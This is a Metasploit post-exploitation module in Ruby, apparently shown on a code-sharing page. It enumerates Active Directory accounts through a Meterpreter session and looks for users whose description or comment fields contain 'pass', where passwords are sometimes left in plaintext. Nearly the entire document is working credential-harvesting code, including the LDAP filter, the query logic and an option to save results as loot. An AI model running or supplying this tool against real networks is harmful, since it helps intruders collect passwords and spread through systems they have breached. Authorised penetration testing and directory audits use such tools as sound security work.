Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Auxiliary::Report
8
  include Msf::Post::Windows::LDAP
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name'	=> 'Windows Gather Active Directory User Comments',
15
        'Description' => %q{
16
          This module will enumerate user accounts in the default Active Domain (AD) directory which
17
          contain 'pass' in their description or comment (case-insensitive) by default. In some cases,
18
          such users have their passwords specified in these fields.
19
        },
20
        'License' => MSF_LICENSE,
21
        'Author' => [ 'Ben Campbell' ],
22
        'Platform' => [ 'win' ],
23
        'SessionTypes' => [ 'meterpreter' ],
24
        'References' => [
25
          ['URL', 'http://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx'],
26
        ]
27
      )
28
    )
29

30
    register_options([
31
      OptBool.new('STORE_LOOT', [true, 'Store file in loot.', false]),
32
      OptString.new('FIELDS', [true, 'Fields to retrieve.', 'userPrincipalName,sAMAccountName,userAccountControl,comment,description']),
33
      OptString.new('FILTER', [true, 'Search filter.', '(&(&(objectCategory=person)(objectClass=user))(|(description=*pass*)(comment=*pass*)))']),
34
    ])
35
  end
36

37
  def run
38
    fields = datastore['FIELDS'].gsub(/\s+/, '').split(',')
39
    search_filter = datastore['FILTER']
40
    max_search = datastore['MAX_SEARCH']
41

42
    begin
43
      q = query(search_filter, max_search, fields)
44
      if q.nil? || q[:results].empty?
45
        return
46
      end
47
    rescue ::RuntimeError, ::Rex::Post::Meterpreter::RequestError => e
48
      # Can't bind or in a network w/ limited accounts
49
      print_error(e.message)
50
      return
51
    end
52

53
    # Results table holds raw string data
54
    results_table = Rex::Text::Table.new(
55
      'Header' => 'Domain Users',
56
      'Indent' => 1,
57
      'SortIndex' => -1,
58
      'Columns' => fields
59
    )
60

61
    q[:results].each do |result|
62
      row = []
63

64
      result.each do |field|
65
        if field[:value].nil?
66
          row << ''
67
        else
68
          row << field[:value]
69

70
        end
71
      end
72

73
      results_table << row
74
    end
75

76
    print_line results_table.to_s
77

78
    if datastore['STORE_LOOT']
79
      stored_path = store_loot('ad.users', 'text/plain', session, results_table.to_csv)
80
      print_good("Results saved to: #{stored_path}")
81
    end
82
  end
83
end
84

85